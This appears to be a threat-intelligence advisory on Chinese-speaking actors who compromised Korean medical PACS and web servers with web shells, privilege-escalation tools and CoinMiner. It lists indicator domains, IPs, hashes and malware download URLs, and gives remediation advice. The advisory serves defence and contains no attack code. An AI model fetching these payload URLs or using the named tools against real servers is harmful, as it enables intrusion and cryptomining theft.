Analysis Summary

Threat actors targeted the Windows IIS server of a South Korean medical establishment's Picture Archiving and Communication System (PACS), leading to CoinMiner infections as discovered by researchers.

The attacks, suspected to be orchestrated by Chinese threat actors, involved uploading web shells like Chopper and Behinder to the server, performing system reconnaissance, and using tools such as Cpolar for remote access and BadPotato for privilege escalation. A CoinMiner was introduced through a "1.cab" file, which included a batch script, task scheduler XML, and a downloader.

According to the researchers, the attackers utilized a comprehensive toolkit featuring additional web shells (ASPXspy, Caidao), privilege escalation tools (PrintNotifyPotato, IIS LPE, GodPotato), and port forwarding tools (Lcx, Frpc). This allowed them continuous access and control over the compromised server, facilitating further exploitation and cryptocurrency mining. Chinese annotations on the scripts further implicated Chinese-speaking cybercriminals in these attacks.

Just days after the initial attack, a second assault was launched on another Korean medical institution's web server. This time, the attackers employed Certutil to download more malware, alongside privilege escalation tools like GodPotato, PrintNotifyPotato, and the CVE-2021-1732 exploit. They also used network exploration tools such as fscan, remote shell, and Netcat. EarthWorm acted as a proxy tool while Ladon, a versatile Chinese-built tool, was used for various stages of the attack.

The attacks highlight the continuous targeting of vulnerable web servers in Korea, specifically by Chinese-speaking groups. Recommendations to prevent such breaches include addressing file upload vulnerabilities, implementing regular password changes, applying access controls to prevent lateral movement, and keeping antivirus software up-to-date. These measures are crucial for securing critical systems like PACS in hospitals and other sensitive environments.

Impact

• Sensitive Data Theft
• Unauthorized Access
• Privilege Escalation
• Financial Loss

Indicators of Compromise

Domain Name

• sinmaxinter.top

IP

• 14.19.214.36
• 1.119.3.28

MD5

• 67af0bc97b3ea18025a88a0b0201c18d
• f6591c1ab7f7b782c386af1b6c2c0e9b
• 986c8c6ee6f6a9d12a54cf84ad9b853a
• 2183043b19f4707f987d874ce44389e3
• 2c3de1cefe5cd2a5315a9c9970277bd7
• 69c7d9025fa3841c4cd69db1353179cf
• 10b6e46e1d4052b2ad07834604339b57
• 5f3dd0514c98bab7172a4ccb2f7a152d
• b81577dbe375dbc1d1349d8704737adf

SHA-256

SHA1

• 51847150b3dd7ee8ac71bddad558325476d75c69
• 2d65963e7a3251cab376a16d7507aa2d3f12f97c
• 409f39571d3ab244ef517b2fe8a44b646fb8b900
• f26028851f3b6f81c915ee1243173434fad86172
• f62f7a033a28757a6d638b99011ceca8e95b52f9
• 28880ee127c46e77dc440f158c1cd8c579d90e93
• 14400e1990244f850bd268621af28824c71e12cd
• 232a0585a7cb6c54e15d5410c96aac5913038e7f
• c12f1627ae31663c8d30a8fd17bc2b3674e13590

URL

• http://14.19.214.36/aa.aspx
• http://14.19.214.36/fscan.exe
• http://14.19.214.36/ew.exe
• http://14.19.214.36/11.exe
• http://14.19.214.36/RingQ.exe
• http://45.130.22.219/aspx.exe
• http://192.210.206.76/sRDI.dat

Remediation

• Block all threat indicators at your respective controls.
• Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
• Patch and upgrade any platforms and software timely and make it into a standard security policy. Prioritize patching known exploited vulnerabilities and zero-days.
• Along with network and system hardening, code hardening should be implemented within the organization so that their websites and software are secure. Use testing tools to detect any vulnerabilities in the deployed codes.
• Maintain cyber hygiene by updating your anti-virus software and implementing a patch management lifecycle.
• In addition, users can also consider using ad-blockers and disabling JavaScript in their web browsers to reduce the risk of drive-by downloads of CoinMiner malware.
• Use web application firewalls (WAF) to detect and block malicious traffic.
• Restrict the use of administrative privileges and use them only when necessary.
• Implement network segmentation to limit the spread of malware.